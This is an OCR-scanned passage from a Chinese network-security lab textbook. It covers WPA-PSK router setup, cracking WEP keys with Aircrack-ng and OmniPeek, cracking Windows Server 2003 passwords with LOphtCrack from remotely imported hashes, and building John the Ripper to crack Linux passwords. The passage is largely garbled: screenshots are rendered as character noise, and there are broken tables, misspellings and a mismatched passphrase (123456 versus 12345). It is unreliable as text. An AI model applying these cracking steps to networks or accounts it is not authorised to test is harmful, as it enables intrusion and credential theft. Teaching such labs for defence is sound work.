它 也 可 以 用 在 较 不 保险 的 “pre-shared key” 模 式 ， 让 每 个 用 户 都 用 同一 个 口令 。 

密 钥 模式 (Pre-Shared Key，PSK， 又 称 为 个 人 模式 ) 是 设计 给 负担 不 起 802.1X 验证 服 
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务 器 的 成 本 和 复杂 度 的 家 庭 和 小 型 公司 网 络 用 的 ， 每 一 个 使 用 者 必须 输入 口令 来 取 用 网 
络 ， 而 口令 可 以 是 8 一 63 个 ASCH 字符 、 或 是 64 个 十 六 进 制 数字 (256b)。 使 用 者 可 以 
自行 项 酌 要 不 要 把 密语 存在 计算 机 里 以 省 去 重复 输入 的 麻烦 ， 但 口令 一 定 要 存在 Wi-Fi 


接 入 点 里 。 


由 于 WPA 增 大 了 密 钥 长 度 和 初始 向 量 、 减 少 了 与 密 钥 相关 的 封包 个 数 、 再 加 上 实 
施 了 身份 验证 ， 使 得 侵入 无 线 局 域 网 络 变 得 困难 许多 。 因 此 WPA 被 认为 是 802.11 标准 


的 过 渡 安 全 方案 。 


【实验 环境 】 
(1) 带 有 无 线 网 卡 的 计算 机 两 台 。 


(2) 带 有 WEP 功能 的 无 线路 由 器 一 台 ( 本 书 以 H3C WAP500a/g 无 线路 由 器 为 例 )。 


【实验 步骤 】 
A) 首先 将 无 线路 由 器 恢复 到 出 三 设置 ， 并 打开 。 


(2) 打开 计算 机 的 无 线 网 络 连接 ， 在 网 络 列 表 中 可 以 看 到 无 线路 由 器 信息 ， 


相同 ， 显 示 为 未 设置 安全 机 制 的 无 线 网 络 ， 如 图 15-9 所 示 。 


zi 


«IT 
zn 
= 


paso BRIERS 

PEL 单 击 以 下 列表 中 的 项 目 以 连接 到 区 域内 的 无 线 网 络 或 奖 得 更 多 信息 0). 

| | «po TAPSOUg - —— | 

未 设置 安全 机 制 的 无 线 网 络 ai 

| 相关 任务 

i TREBE 

EET 

<p Bamana 

EO) 


图 15-9 无 线 网 络 连接 


G) 打开 浏览 器 ， 登 录 到 无 线路 由 器 默认 的 配置 页 面 与 前 节 相同 ，H3C WAP500 路 
由 器 的 默认 配置 页 面 地 址 为 ，192.168.1.100。 选 择 Wireless Security 一 802.11G Security, 


如 图 15-10 所 示 。 


现在 的 Security Mode 选项 仍 为 Open System， 为 了 方便 演示 ， 这 里 选择 WPA-PSK 
加 密 方 式 , 即 对 不 同 用 户 使 用 同一 个 密码 。 Cipher Type 选择 TKIP (Temporal Key Integrity 
Protocol)， 在 WPA PassPhrase 对 话 框 中 填写 密码 ， 如 图 15-11 所 示 。 


215 


mem 网 络 安全 实验 教程 (第 2 版 ) mm 


802.11A RADIUS Server Access Control 


802.11G Security 
Security Mode © Open System © Shared Key © 802.1x 
C wra-psk C WPA 


Cipher Type © Disable C wep € aes © TKIP © Auto 


e e 


EE (UNE) jae 


e = E | 
e 于 = [None E 
e | Eg me | 
e 于 == [Wn | 
图 15-10 无 线路 由 器 配置 页 面 
802.11A RADIUS Server — Access Control 
Security Mode C Open System © SharedKey © 802.1x 
€ wPA-PSK C WPA 
Cipher Type © Disable © wep C AES € TKIP C Auto 
e e 
6s bt gm] Genere 
e [ [None a 
e [ [None a 
e [ [None z 
. 三 
WPA PassPhrase [123456 
Key Update Interval 1800 (0 or > 1800 sec) 


RADIUS Server Setting 


[apply] _cancet | 
图 15-11 WPA 加 密 配 置 页 面 


(4) 同上 节 ， 配 置 完成 后 单 击 下 方 的 Apply 按钮 ， 再 单 击 REBOOT AP 重启 路 由 器 


完成 配置 。 


C5) 这 时 再 次 打开 计算 机 的 无 线 网 络 连接 , 在 网 络 列表 中 可 以 看 到 无 线路 由 器 信息 ， 


这 时 显示 为 启用 安全 的 无 线 网 络 。 单 击 【连接 】 按 钮 ， 弹 出 一 个 对 话 框 ， 提 示 需 要 输入 
WPA 密 钥 。 输 入 刚刚 设置 的 密码 12345， 连 接 成 功 。 


216 


(6) 同上 节 ， 为 了 验证 WPA 的 加 密 效果 ， 在 另 一 台 机 器 打开 OmniPeek 软件 ， 本 机 


AE 


$4153 无 线 网 络 安全 


同样 对 百度 主页 进行 ping 操作 ， 如 图 15-12 所 示 。 


C:\Documents and Settings\zhutou>ping -n 9999 www.baidu.con 


[119.75.218.45] 


Pinging www.a.shifen.com 


with 32 bytes of data: 


119.75 .218.45: 
119.7 


fron 
fron 
from 
fron 


119.75 

119.75.218 
8.45 

119.75.218.45: 


图 15-12 对 百度 首页 进行 ping 操作 


在 另 一 台 机 器 上 使 用 OmniPeek 对 本 机 数据 进行 抓 包 。 抓 取 数 据 如 图 15-13 所 示 。 可 
以 看 到 数据 均 已 经 过 加 密 。 


LN reshark -ini xi 
File Edit View Go Capture Analyze Statistics Telephony Tools Help 
Ba 3 of a axal F7 Z2Z|EEelaRaaan annk] B 
Filter ~ Expression. Clear Apply 
Yo Time [Source ^ [Destination [Protocol [1n£o aj 

3593 52.018954 Hangzhou. 03:7e:2c IEEE BCBeacon frame, SN=1332 

4664 68.095795 Hangzhou 03 c IEEE B(Beacon frame, SN=1515 

4125 60.415746 Hangzhou 03 c IEEE BBeacon frame, SN=1430 

2494 39.526349 Hangzhou 03 c IEEE &(Beacon frame, SN-1198 

4653 67.890920 Hangzhou 03 c Broadcast IEEE B(Beacon frame, SN=1513 

4073 59.699204 c Broadcast IEEE frame 


8C Beacon 


Hangzhou. 03 
hi fr 


Hangzhou_03 Broadcast 8C Beacon frame 


2828 Hangzhou_03 Broadcast IEEE B(Beacon frame, SN=1182, 
3424 49.663774 Hangzhou. 03 Broadcast IEEE B(Beacon frame, SN=1307, 
3021 44.748583 Hangzhou 03: Broadcast IEEE B(Beacon frame, SN=1254, 
d 
0000 80 00 00 00 ff TF TF TF ff TF OO OF e2 03 7e 2c 
0010 00 Of ez 03 7e 2c fO 4a 37 a0 ed 58 00 00 00 00 
0020 64 00 31 04 00 07 00 00 00 00 00 00 00 Ol 08 82 
0030 84 8b 96 Oc 18 30 48 03 01 Ob 05 04 00 O1 00 00 
040 2a 01 00 32 04 12 24 60 Gc dd 16 00 50 f2 01 01 
0050 00 00 50 f2 02 01 00 00 50 f2 02 O1 00 00 50 f2 
o060 02 
图 15-13 经 过 WPA 加 密 的 密 文 数据 包 
属于 线路 9g. rye ax Hy y i Ar i at A = n IW È 
将 无 线路 由 器 的 WPA 加 密 取 消 , 再 次 通过 OminPeek 抓 取 未 经 过 WPA 加 密 的 数据 ， 


进行 对 比 。 未 经 WPA 加 


进行 了 保护 。 


aux 
ps 


的 数据 如 图 15-14 所 示 。 两 者 对 比 可 以 看 出 WPA 对 无 线 数据 


【实验 报告 】 
C1) R WPA 的 加 密 方式 的 优点 。 


(2) 简 述 WPA 为 什么 被 认定 为 到 达 较 安全 的 802.11 标准 之 前 的 过 渡 方 案 。 


(3) 自己 动手 完成 对 无 线路 由 器 的 WPA 配置 ， 


【思考 题 】 


WPA 针对 WEP 几 大 缺陷 的 改进 ， 哪 些 方面 值得 读者 


并 实现 验证 。 


学 习 ? 
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四 


File Edit View Go Capture Analyze Statistics Telephony Tools Help 
gaaealcuxesueeeozzí[Bmiaaaeni- 
Filter: v Expression... Clear Apply 


Wo. ^ [Destination [Protocol [Info E 
824 14.971088 119.75.218.45 192.168.1.98 ICMP Echo (ping) reply 四 
483 8.970547  119.75.218.45 192.168.1.98 ICMP Echo (ping) reply 
542 9.971869  119.75.218.45 192.168.1.98 ICMP Echo (ping) reply 
Cues 272028 119.75.218.45 192.168.1.98 ICMP ecto Suus) aar 

96 12 8 11° REI 192 ICMP E ) reply 
rer 7. — 119. 218.45 192.168.1.98 ICMP Echo 3 
641 11.971265 119.75.218.45 192.168.1.98 ICMP Echo TES reply 
154 2.970406 119.75.218.45 192.168.1.98 ICMP Echo (ping) reply 
871 15.970398 119.75.218.45 192.168.1.98 ICMP Echo (ping) reply 
108 1.971216  119.75.218.45 192.168.1.98 ICMP Echo (ping) reply 
1135 19.971735 119.75.218.45 192.168.1.98 ICMP Echo (ping) reply 
([ 107018 ortTas 10 78 238 AK 10» 1421 og TCMD erha (enm) rentu "1d 


n e C$ 7c ab Ba p e 2c 
fO 7d 68 c2 16 73 40 88 aa aa 03 00 00 00 08 00 
45 00 00 3c a9 08 00 00 33 01 cb 35 77 4b da 2d 
[030 cO a8 01 62 00 00 b5 54 02 00 9e 07 61 62 63 64 
[)040 65 66 67 68 69 6a 6b 6c 6d 6e 6f Hs 71 72 73 74 efi and ES 
[050 75 76 77 61 62 63 64 65 66 67 68 6 üveabcde fghi 


图 15-14 未 经 WEP 加 密 的 明文 数据 包 


452 WEP 口令 破解 


15.2.1 WEP 及 其 漏洞 


WEP 在 推出 以 后 ， 由 于 其 自身 设计 的 缺陷 : 如 密 钥 长 度 不 足 、IV 的 雷同 性 等 问题 ， 
造成 了 许多 漏洞 。 通 过 这 些 漏 洞 ，WEP 可 以 轻易 地 被 人 攻击 ， 造 成 了 很 大 的 无 线 网 络 安 
全 隐患 。 主 要 WEP 漏洞 如 表 15-1 所 示 。 

表 15-1 WEP 漏洞 
认证 机 制 过 于 简单 ， 很 容易 破解 ， 而 且 一 旦 破解 ， 由 于 使 用 的 与 加 密 用 的 密 铀 是 同一 
个 ， 会 危及 以 后 的 加 密 部 分 
漏洞 2 认证 是 单 向 的 ， 客 户 端 不 能 认证 AP 
漏洞 3 初始 向 量 太 短 ， 重 用 很 快 ， 为 攻击 者 提供 方便 
漏洞 4 RC4 算法 本 身 的 WeakKey 问题 ， 在 WEP 中 没有 采取 措施 避免 
漏洞 5 没有 办 法 应 对 重 放 攻 击 
漏洞 6 ICV 被 发 现 有 弱点 ， 有 可 能 传输 数据 被 修改 而 不 被 检测 到 
漏洞 7 没有 密 钥 管理 、 更 新 、 分 发 机 制 


漏洞 1 


15.2.2 Aircrack-ng 简介 及 安装 


Aircrack-ng 是 一 款 用 于 破解 无 线 802.11WEP 及 WPA-PSK 加 密 的 工具 。 其 既是 一 
无 线 攻击 工具 ， 同 时 也 是 一 款 必 备 的 无 线 安 全 检测 工具 ， 可 以 帮助 管理 员 进 行 无 线 网 络 
密码 脆弱 性 检查 及 了 解 网 络 信号 的 分 布 情况 , 非常 适合 对 企业 进行 无 线 安 全 升级 时 使 用 。 
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在 Windows 下 安装 Aircrack-ng 很 简单 ， 从 官方 网 站 下 载 Win32 版 本 的 压缩 包 到 本 
地 ， 直 接 解压 到 某 个 文件 夹 下 即 可 。 不 过 ， 由 于 Aircrack-ng 只 对 部 分 网 卡 型 号 兼容 ,在 
使 用 之 前 需要 将 现 有 的 无 线 网 卡 驱 动 替 换 成 Wildpackets 专用 网 卡 驱动 程序 .关于 支持 网 
卡 及 对 应 驱动 程序 可 到 http://www.wildpackets.com/support/downloads/drivers 查看 。 


15.2.3 Windows 下 破解 无 线 WEP 


【实验 目的 】 
掌握 Windows 下 破解 无 线 WEP 的 方法 ， 了 解 WEP 的 安全 缺陷 。 
【原理 简介 】 


通过 抓 取 足够 的 网 络 数据 包 (5 万 一 30 万 )， 利 用 密 钥 长 度 不 足 、IV 可 能 出 现 的 雷 
同性 ， 计 算出 WEP 密 钥 。 

【实验 环境 】 

A) 带 有 无 线 网 卡 的 计算 机 一 台 ， 本 书 以 Intel. PRO/Wireless 3945ABG 无 线 网 卡 
为 例 。 

(2) 可 进行 WEP 加 密 的 无 线路 由 器 一 台 ， 本 书 以 H3C WAP500a/g 路 由 器 为 例 。 

(3) 频道 分 析 工 具 MetaGeek Chanalyzer, OmniPeek 和 Aircrack-ng。 


【实验 步骤 】 

(1) ¥ Intel PRO/Wireless 3945ABG 驱动 升级 为 10.5.1.72 或 10.5.1.75， 装 有 管理 软 
件 请 先 关闭 。 

(2) 分 别 安装 MetaGeek Chanalyzer. OmniPeek 和 Aircrack-ng 等 软件 ， 其 中 安装 
OmniPeek 软件 时 需 先 安装 Microsoft NET Framework 2.0. 

(3) 开始 破解 ,用 MetaGeek Chanalyzer 软件 找 出 要 破解 的 信号 的 频段 和 AP 的 MAC 
地 址 ， 如 图 15-15 所 示 。 


图 15-15 MetaGeek Chanalyzer 


(4) 打开 OmniPeek 软件 进行 抓 包 ，WildPackets API 显示 为 YES， 则 说 明 已 正常 识 
别 网 卡 ， 如 图 15-16 所 示 。 
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Monitor Options — 无 线 网 络 连 族 E3 


Adapter 

802.11 

Statistics Output 
Performance 


Adapter 
aX 
X None 
Œ [a] File 
S Mj Local machine: LHD-E36120CS2EE 
89 1394 连接 
H9 本 地 连接 
B9 无 线 网 络 连 接 
ilat OPE EIN 
Device Intel(R) PRO/Wireless 3945ABG Network... 
Media Wireless 802.11 
Address O0-1C:BF:CA:11:E2 
Link Speed 54 Mbits/s 
WidPackets API Yes 


[ wx ][ 取消 ][ 9 


图 15-16 网卡 驱动 已 安装 正确 


(5) 对 OmniPeek 过 滤器 进行 设置 ， 设 置 只 允许 抓 WEP 的 数据 包 。 如 果 过 滤器 列表 
中 没有 ， 可 以 增加 一 个 。 并 在 列表 中 的 对 应 项 打 钧 ， 如 图 15-17 和 图 15-18 所 示 。 


‘= OmniPeek Personal - [Filters] 


图 Fie Edt View Capture Send Monitor Tools Window Help 
D-€-uo MBBS 9S TLOM? se 
+t? XxX B-E 
Filter + Comment 
* 902.11 Ad-Hoc Network Beacon frames with ESS I= 1 
f 80211 Beacons Beacon packets 
* 802.11 Control Control packets 
守 202.11 Data Data packets. 
YF 902.11 From ps Packets from DS 
* 802.11 Management Management packets 
SẸ 802.11 More Data More data bit on 


图 15-17. OmniPeek 过 滤器 列表 


(6) 设置 一 下 内 存 缓存 大 小 ，General-Buffer size 一 般 调 整 为 100MB 即 可 (如 果 
100MB 破解 失败 ， 可 以 尝试 将 缓存 大 小 调整 到 300MB UE), WE 15-19 所 示 。 

(7) 在 802.11 选项 中 设置 要 抓 取 的 信号 频道 ， 如 果 前 面 频道 分 析 发 现 一 个 频道 内 有 
多 个 无 线 AP 信息 时 ， 可 以 使 用 MAC 地 址 来 固定 抓 取 对 象 ， 如 图 15-20 所 示 。 

(8) 设置 完成 后 ， 单 击 OK 按钮 ， 单 击 右边 绿色 按钮 Start Capture 开始 抓 包 。 若 当 
次 抓 不 到 所 达到 数据 包 量 时 ， 可 以 保存 数据 包 供 下 次 一 起 加 载 破解 。 如 果 抓 包 结束 了 ， 


单 击 Start Capture, TZ Ctrl+S 组 合 键 保存 ， 如 图 15-21 所 示 。 
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Insert Filter Protocol Filter È 
: [802.11 wep data Generic ProtoSpec v 
Name 
802.11 WEP Data 
Description ^ 
80211 CF-Ack... = 
802.11 QoS CF-. 
802.11 Data. 
802.11 QoS Null... 802.11 QoS Nul... 802.11 null func. 
802.11 Reassoc... Reassociation R... Similar to an As. 
802.11 Reassoc... Reassociation R... Similar to an As.. 
80211 RTS Request to Send Request To Sen. 
802.11 TKIP Data 802.11 TKIP Data TKIP-encoded 8. 
802.11 WEP Data 802.11 WEP Data WEP-encoded 8... 
8021x 8024x The 802.1X stan. 
8023 IEEE 8023 8023 is a comp.. 
AARP AARP AppleTalk Addr... M 


[Sice to header 


图 15-18 新 增 一 个 过 滤器 


Capture Options - Wireless Network Connection 区 | 
General General 
Adapter 
802.11 Capture title: ] 
Triggers 
Filters Continuous capture 
Statistics Output 5 dii 
Performance 


C Limit each packet to bytes 
Buffer size: [100 $| megabytes 


[v] Show this dialog when creating a new capture 


Cox) Cree ] 
图 15-19 ”设置 缓存 大 小 


Capture Options - Wireless Network Connection 


General 
Adapter 

802.11 

Triggers 

Filters 

Statistics Output 
Performance 


图 15-20 ”使 用 MAC 地 址 来 固定 抓 取 对 象 
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mnipeek Personal - [Capture 1] 


db File Edt View Capture Send Monitor Tools Window Help 


)- €- > QAAA $ 4Yv9iu$v-e AOL 
Packets received: 308,382 || Memory usage: | 99% | 
Packets filtered: 152887 Filter state: He Accept only packets matching one filter 
= Capture = Ox! a e 2 
Packets 
ion Flags Channel Signal DataRate Size Relative Time 
Fiters 33 V 1i 12% 1.0 356 0.000000 
= Expert 33 11 82% 1.0 365 0.025384 
Hierarchy 33 1l 81& 1.0 424 0.029033 
Flat 33 1 84% 1.0 — 430 0.032747 
Application |33 1i 82% 1.0 418 0.036312 
= Visuals 33 wW 1l TH 54.0 1536 0.036640 
Peer Map 33 Ww 1l 85% 54.0 1536 0.036640 
Graphs 33 W 1i 815 54.0 1536 0.036640 
= Statisti 33 wW 1i 78% 54.0 1536 0.036640 
图 15-21 抓 取 结果 


(9) 将 保存 的 数据 包 载 入 到 Aircrack-n 
图 15-22 所 示 。 


eX C: MIINDOTSASysten32 Vcn. 

aircrack-ng\test \wpa.cap 
985 packets 
BSSID 


00:18 
aa: 
36 


ux 
n 


(10) 破解 出 WEP 


‘System32\cmd. exe 


图 15-23 
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g 
5 


中 进行 破解 ， 选 择 IVs 值 最 大 即 可 ， 如 


<lo xi 


Encryption 


WEP 
WEP 
WEP 


«328546 I 


2 IVs) 
hand 


uPA 
WEP 
WEP 
WEP 
WEP 
WEP 
WEP 


码 ， 如 图 15-23 所 示 。 


lol xj 


破解 出 WEP 密码 


ns € 15 X 无 线 网 络 安全 


【实验 报告 】 

(1) 说 明 破 解 WEP 加 密 的 流程 。 

(2) 详细 说 明 破 解 WEP 加 密 的 原理 
【思考 题 】 

说 明 为 何 要 设置 缓存 大 小 在 100MB 以 上 ? 
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161 ”账号 口令 破解 


16.1.1 使 用 LOphtCrack 破解 Windows Server 2003 口令 


【实验 目的 】 
掌握 Windows 下 口令 攻击 的 技术 和 方法 ， 以 及 防御 措施 。 


【原理 简介 】 

口令 破解 器 是 一 个 程序 ， 它 能 将 口令 解 译 出 来 ， 或 者 让 口令 保护 失效 。 口 令 破解 器 
一 般 并 不 是 真正 地 去 解码 ， 因 为 事实 上 很 多 加 密 算法 是 不 可 逆 的 。 大 多 数 口令 破解 器 是 
通过 尝试 一 个 一 个 的 单词 ， 用 知道 的 加 密 算法 来 加 密 这 些 单词 ， 直 到 发 现 一 个 单词 经 过 
加 密 后 的 结果 和 要 解密 的 数据 一 样 ， 就 认为 这 个 单词 就 是 要 找 的 密码 了 。 

LOphtCrack 是 在 Windows 平台 上 使 用 的 口令 审计 工具 。 它 能 通过 保存 在 Windows 
操作 系统 中 的 cryptographic hashes 列表 来 破解 用 户口 令 。 通 常 为 了 安全 起 见 ， 用 户 的 口 
令 都 是 在 经 过 加 密 之 后 保存 在 Hash 列表 中 的 。 这些 敏 感 的 信息 如 果 被 攻击 者 获得 , 他 们 
不 仅 可 能 会 得 到 用 户 的 权限 ， 也 可 能 会 得 到 系统 管理 员 的 权限 ， 这 后 果 将 不 堪 设 想 。 
LOphtCrack 可 通过 各 种 不 同 的 破解 方法 对 用 户 的 口令 进行 破解 。 

了 解 破解 用 户口 令 的 方法 是 一 件 非常 有 意义 的 事情 。 最 重要 的 是 可 以 帮助 系统 管理 
员 对 目前 使 用 的 用 户口 令 的 安全 性 能 做 出 评估 。 实 践 证 明 ， 那 些 没 有 经 过 测试 就 使 用 的 
口令 ， 在 黑客 的 攻击 面前 会 显得 不 堪 一 击 。 此 外 ， 还 能 帮助 用 户 找 回 遗忘 的 口令 、 检 索 
用 户口 令 ， 简 化 用 户 从 Windows 平台 移植 到 其 他 的 平台 《〈 如 移植 到 UNIX 平台 ) 的 过 
程 等 。 

LOphtCrack 能 直接 从 注册 表 、 文 件 系 统 、 备 份 磁盘 或 是 在 网 络 传输 的 过 程 中 找到 口 
令 。LOphtCrack 开始 破解 的 第 一 步 是 精简 操作 系统 存储 加 密 口令 的 Hash 列表 ， 然 后 才 
开始 口令 的 破解 。 它 采用 三 种 不 同 的 方法 来 实现 。 

(1) 一 种 最 快 也 是 最 简单 的 方法 是 字典 攻击 。LOphtCrack 将 字典 中 的 词 逐个 与 口令 
Hash 列表 中 的 词 做 比较 。 当 发 现 匹 配 的 词 时 ， 显 示 结 果 ， 即 用 户口 令 。LOphtCrack 自 带 
一 个 小 型 词 库 。 如 果 需 要 其 他 字典 资源 可 以 从 互联 网 上 获得 。 这 种 破解 的 方法 ， 使 用 的 
字典 的 容量 越 大 ， 破 解 的 结果 越 好 。 

(2) 另 一 种 方法 名 为 hybrid。 它 是 建立 在 字典 破解 的 基础 上 的 。 现 在 许多 用 户 选择 
口令 不 再 单单 只 是 由 字母 组 成 的 ， 他 们 常会 使 用 诸如 “bogus11” 或 “Annaliza!!” 等 添 
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加 了 符号 和 数字 的 字符 串 作 为 口令 。 这 类 口令 是 复杂 了 一 些 ， 但 通过 口令 过 滤器 和 一 些 
方法 ， 破 解 它 也 不 是 很 困难 ，hybrid 就 能 快速 地 对 这 类 口令 进行 破解 。 
G) 最 后 一 种 也 是 最 有 效 的 一 种 破解 方式 “暴力 破解 ”。 按 道理 说 真正 复杂 的 口令 ， 


用 现在 的 硬件 设备 是 无 法 破解 的 。 但 现在 所 谓 复杂 的 口令 一 般 都 能 被 破解 ， 只 是 时 间 长 


短 的 问题 ， 且 破解 口令 时 间 远 远 小 于 管理 员 设 置 的 口令 有 效 期 。 使 用 这 种 方法 也 能 了 解 
一 个 口令 的 安全 使 用 期 限 。 

【实验 环境 】 

Windows XP (ci Jj ) FI Windows Server 2003〔 受 攻击 方 ) 操作 系统 ，LOphtCrack 


6.0.12。 


【实验 步骤 】 

(1) 获得 LOphtCrack 安装 包 ， 然 后 将 LOphtCrack 安装 到 本 地 。 

(2) 攻击 方 需要 知道 受 攻击 者 的 管理 员 用 户 名 和 口令 ， 这 样 才能 在 攻击 中 获取 其 他 
用 户 的 账号 。 因 此 受 攻击 方 应 该 将 自己 的 管理 员 用 户 名 和 口令 告诉 攻击 方 。 然 后 ， 攻 击 


方 开始 攻击 。 
(3) 单 击 【 
界面 ， 如 图 16-1 


开始 】| 【程序 】|LOphtCrack 6|LOphtCrack 6， 打 开 LOphtCrack， 进 入 主 
所 示 。 


密 后 的 口令 ， 如 


图 16-1 选择 口令 获取 方式 
(4) 单 击 Menu 中 的 Import Hashes， 进 入 到 Import 界面 ， 选 择 从 远程 机 器 中 获取 加 


图 16-2 所 示 。 
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Inport from This import method retrieves the encrypted 
$ passwords from networked Windows 
(Local machi NT/2000/2003 machines or Unix machines 
running ssh. 


Import from file Platform diem 
OFron SAM file 
fron 164... es 


OFron PHDUIP file 


: Browse... 
(From Unix shado... 


Clear 


Open... 
[Ignore Cached Credentials 


Save As... 


图 16-2 导入 口令 文件 


(5) 单 击 右边 的 Add 按钮 ， 输 入 受 攻击 方 的 主机 名 或 IP 地 址 ,访问 受 攻击 方 的 账 
户 数 据 库 ， 在 这 里 输入 的 是 192.168.202.128， 如 图 16-3 所 示 。 

(6) 单 击 OK 按钮 后 需要 输入 受 攻 击 方 的 管理 员 用 户 名 和 密码 〈 或 者 是 管理 员 授 权 
的 用 户 名 与 密码 )， 如 图 16-4 所 示 。 


Please enter credentials for an account 
with Administrator privileges on the 


192. 168. 202. 128 
User: Administrator 
Password: 

Domain: 


Machine 192.168.202.124 


[Save these credentials for future... 


(S) indors 


Qk | Cancel | 


图 16-3 配置 目标 图 16-4 输入 受 攻击 方 的 管理 员 账 户 信 息 


(7) 单 击 OK 按钮 后 LOphtCrack 就 会 破解 受 攻击 方 的 所 有 用 户 的 口令 信息 ， 结 果 如 
图 16-5 所 示 。 
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Menu 
Run T Import 
Wizard Hashes From Sniffer 
re Mi 


User Wane — ou Password Age (A) 
. Administrator 0 
. ASPNET 251 


»  IUSR ZHOU-OBBTCF... 264 

. IWAM_ZHOU-O8B7CF... 264 
UPPORT, 3889454l t 

. Administrator 0 

- ASPNET 251 


图 16-5 口令 破解 结果 

取决 于 密码 复杂 性 和 用 户 数量 ，LOphtCrack 将 花费 相应 的 时 间 以 破解 密码 。 使 用 
LOphtCrack 破解 Windows Server 2003 密码 属于 字典 / 穷 举 算法 ， 这 也 是 很 多 暴力 攻击 工 
具 使 用 的 方法 ， 密 码 稍微 复杂 一 些 ， 要 破解 就 会 花费 相当 长 的 时 间 ， 因 此 ， 适 当 使 用 较 
为 复杂 的 密码 可 以 极 大 地 加 强 系统 的 安全 性 。 

【实验 报告 】 

(1) 详细 叙述 实验 过 程 ， 通 过 在 系统 中 添加 不 同安 全 强度 的 口令 ， 测 试 安全 口令 的 
条 件 。 

(2) 口令 长 度 对 于 口令 破解 的 具体 影响 。 

【思考 题 】 

根据 实验 结果 分 析 如 何 设置 用 户 的 口令 才 比 较 安 全 。 


16.1.2 ”使 用 John the Ripper 破解 Linux 密码 


【实验 目的 】 
了 解 破解 Linux 密码 的 原理 ， 从 中 学 习 如 何 保护 Linux 操作 系统 中 的 口令 文件 。 
【原理 简介 】 


由 于 UNIX/Linux 是 Internet 最 流行 的 服务 器 操作 系统 ， 因 此 它 的 安全 性 备 受 关注 
这 种 安全 主要 靠 口令 实现 。UNIX 的 口令 仅 存储 在 一 个 加 密 后 的 文本 文件 中 ， 文 件 一 般 
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储存 在 /etc 目录 下 ， 名 称 为 passwd。 历 史上 ，UNIX 口令 加 密 算法 曾经 历 过 几 次 修正 ， 
现在 普遍 采用 DES 算法 。 用 DES 算法 对 口令 文件 进行 25 次 加 密 。 而 对 每 次 DES 加 密 
产生 的 结果 ， 都 要 用 25 次 查找 与 匹配 才能 进行 一 次 遍历 ， 所 以 理论 上 要 破解 这 样 的 口 
令 ， 其 工作 量 是 很 大 的 。 

UNIX 系统 使 用 一 个 单 向 函数 crypt0， 来 加 密 用 户 的 口令 。 单 向 函数 crypt0 从 数学 
原理 上 保证 了 从 加 密 的 密 文 得 到 加 密 前 的 明文 是 不 可 能 的 或 是 非常 困难 的 。 当 用 户 登 录 
时 ， 系 统 并 不 是 去 解密 已 加 密 的 口令 ， 而 是 将 输入 的 口令 明文 字符 串 传 给 加 密 函 数 ， 将 
加 密 函 数 的 输出 与 /etc/passwd 文件 中 该 用 户 条 目的 PASSWORD 域 进行 比较 ， 若 匹配 成 
功 ， 则 允许 用 户 登录 系统 。 

/etc/passwd 文件 是 UNIX 安全 的 关键 文件 之 一 ， 该 文件 用 于 用 户 登录 时 校 验 用 户 的 
口令 ， 仅 对 root 权限 可 写 。 在 目前 的 多 数 UNIX 系统 中 ， 口 令 文 件 都 做 了 Shadow 变换 ， 
即 把 /etc/passwd 文 件 中 的 口令 域 分 离 出 来 ,单独 存在 /etc/shadow 文件 中 , 并 加 强 对 Shadow 
的 保护 ， 以 增强 口令 安全 。 因 而 ， 在 破解 时 ， 需 要 做 UnShadow 变换 ， 将 /etc/passwd 与 
/etc/shadow 文件 合 二 为 一 。 

在 口令 的 设置 过 程 中 ， 有 许多 个 人 因素 在 起 作用 ， 可 以 利用 这 些 因素 来 帮助 解密 。 
由 于 对 口令 安全 性 的 考虑 ， 禁 止 把 口令 写 在 纸 上 ， 因 此 很 多 人 都 设法 使 自己 的 口令 容易 
记忆 ， 这 就 给 黑客 提供 了 可 乘 之 机 。 

John the Ripper 是 一 个 快速 的 口令 破解 器 ， 支 持 多 种 操作 系统 ， 如 UNIX. DOS. 
Win32. BeOS 和 OpenVMS 等 。 它 设计 的 主要 目的 是 用 于 检查 UNIX 系统 的 弱 口 令 ， 支 
持 几乎 所 有 UNIX 平台 上 经 crypt() 函 数 加 密 后 的 口令 哈 希 类 型 ， 也 支持 Kerberos AFS 和 
Windows NT/2000/XP LM 哈 希 等 。 


【实验 环境 】 
Linux 操作 系统 ，John the Ripper。 


【实验 步骤 】 

(1) 以 root 身份 登录 到 Linux。 

(2) 使 用 linuxconf、useradd、adduser 命令 创建 如 下 用 户 ， 并 设置 口令 ， 如 图 16-6 
所 示 。 

(3) 获得 John the Ripper 源 文件 。 

C4) 解 开 所 得 到 的 压缩 文件 包 ， 得 到 john-1.7.8 文件 夹 : 


tar-zxvf john-1.7.8.tar.gz 


(5) BEA john-1.7.8 FAY sre 文件 夹 : 


cd /john-1.7.8/src/ 


(6) 使 用 make 命令 ， 将 输出 结果 保存 到 type 文件 中 : 


make>type 
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用 户 名 密码 
wordsworth prelude 
blake jerusalem 
keats ode 


[root@localhost root] useradd wordswor th 
[root&localhost root]# useradd blake 

[root&localhost root]# useradd keats 

[root@localhost root]# passwd wordswor th 

Changing password for user wordsworth. 

New password: 

BAD PASS WORD: it is based on a dictionary word 

Retype new password: 

passwd: all authentication tokens updated successfully. 
[root@localhost root]# 


图 16-6 创建 用 户 并 设置 口令 


(7) 使 用 vi 命令 查看 type 文件 内 容 ， 如 图 16-7 所 示 。 


To build John the Ripper, type: 
nake clean SYSTEM 


where SYSTEM can be one of the following: 


1inux-x86-64 Linux, x86-64 with SSE2 (best tested) 
Linux-x86-64-avx Linux, x86-64 with AVX (exper inental) 
Linux-x86-64-xop Linux, x86-64 with AVX and XCP (exper inenta D) 
Linux-x86-sse2 Linux, x86 32-bit with SSE2 (best tested if 32-bit) 
1inux-x86-nmx Linux, x86 32-bit with MK (for old conputers) 
Linux-x86-any Linux, x86 32-bit (for truly ancient computers) 
Linux-x86-avx Linux, x86 32-bit with AVX (exper inenta 1) 
1inux-x86-xop Linux, x86 32-bit with AVX and XOP (exper inental) 
Linux-a Ipha Linux, Alpha 

linux-spare Linux, SPARC 32-bit 

linux-ppc32-a It ivec Linux, PowerPC w/AltiVec (best) 

Linux-ppe32 Linux, PowerPC 32-bit 

1inux-ppe64 Linux, PowerPC 64-bit 

linux- ia64 Linux, IA-64 

freebsd-x86-64 FreeBSD, x86-64 with SSE2 (best) 

freebsd-x86-sse2 FreeBSD, x86 with SSE2 (best if 32-bit) 
freebsd-x86-nmx FreeBSD, x86 with MK 

freebsd-x86-any FreeBSD, x86 

freebsd-a Ipha FreeBSD, Alpha 

openbsd-x86-64 OpenBSD, x86-64 with SSE2 (best) I 
openbsd-x86-sse2 OpenBSD, x86 with SSE2 (best if 32-bit) 
openbsd-x86-nmx OpenBSD, x86 with MK 

openbsd-x86-any OpenBSD, x86 

